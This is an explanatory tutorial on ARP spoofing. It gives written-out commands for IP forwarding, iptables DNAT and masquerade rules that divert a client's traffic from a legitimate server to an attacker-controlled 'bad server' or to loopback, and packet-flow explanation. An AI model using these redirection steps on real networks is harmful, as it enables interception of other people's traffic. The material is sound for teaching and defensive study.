ARP spoofing is a technique that allows an attacker to redirect the traffic of an unsuspecting client to a machine of his choice.
It is based on the fact that the Address Resolution Protocol (ARP) is a protocol that allows a machine to discover the MAC address of another machine, given its IP address.
Loading diagram...
If a bad actor is allowed to reply to an ARP request he has no business replying to, he can redirect the traffic of the client to a machine of his choice, including his own.
This is because he can make the client believe that the MAC address of the machine with the IP address he is looking for is the one the attacker puts in the ARP reply.
Loading diagram...
Capitalizing on the attack
Once the attacker has redirected the traffic of the client to his own machine, he can do whatever he wants with it.
Packet forwarding
By default, all machines are configured to ignore any packet that is not addressed to them, so the attacker has to configure his machine to forward the traffic to wherever he sees fit.
echo 1 > /proc/sys/net/ipv4/ip_forward # enable packet forwarding temporarily
# or
sysctl -w net.ipv4.ip_forward=1 # enable packet forwarding temporarily
To make this configuration permanent, edit /etc/sysctl.conf and set net.ipv4.ip_forward=1, remove the comment if present, then reboot the machine.
# /etc/sysctl.conf
# ...
net.ipv4.ip_forward=1
# ...
Iptables routing
The attacker can use iptables to redirect the traffic to a specific port of his machine.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
More often than not, though, the goal of the attacker is to redirect it to a different machine, like so.
# The tcp traffic directed to the good server 10.0.0.3 port 80 is captured by the attacker
# and sent to the bad server 10.0.0.4 port 8080
iptables -t nat -A PREROUTING -p tcp -d 10.0.0.3 --destination-port 80 -j DNAT --to-destination 10.0.0.4:8080
# To make sure the bad server is able to reply to the client, the attacker has to masquerade the traffic
# This command masquerades the tcp traffic directed to the bad server 10.0.0.4 port 8080
# making it look like it comes from the attacker's machine
# the response is then sent back to the client
iptables -t nat -A POSTROUTING -p tcp -d 10.0.0.4 --dport 8080 -j MASQUERADE
Enabling localhost
If the attacker wants to redirect the traffic to a service running on his own machine, they could just use their machine IP address.
But they may also want to use the loopback address, to redirect the client to a service that can only be accessed by the machine itself, not visible from the network.
To do so, they have to enable alien addresses for the loopback address.
echo 1 > /proc/sys/net/ipv4/conf/all/accept_local # enable alien addresses temporarily
# or
sysctl -w net.ipv4.conf.all.accept_local=1 # enable alien addresses temporarily
For a permanent configuration, edit /etc/sysctl.conf and set net.ipv4.conf.all.accept_local=1, remove the comment if present, then reboot the machine.
# /etc/sysctl.conf
# ...
net.ipv4.conf.all.accept_local=1
# ...
The iptables configurations seen before become
# All the tcp traffic to the good server is redirected to the loopback address of the attacker's machine
iptables -t nat -A PREROUTING -p tcp -d 10.0.0.3 --destination-port 80 -j DNAT --to-destination 127.0.0.1
What happens to the packets
The packets are processed by the machine in the following order.
Loading diagram...
What we do with iptables is to alter the packets in the PREROUTING chain, before the routing decision is made, and in the POSTROUTING chain.
In the PREROUTING chain, we can alter the destination address of the packet, so that it is routed to a different machine.
In the POSTROUTING chain, we masquerade the packet.
This means that we alter the source address of the packet, so that it appears as if it came from the attacker’s machine.
Once the response has been sent back to the attacker’s machine, the latter will remember the original sender, the client, and forward the response to it.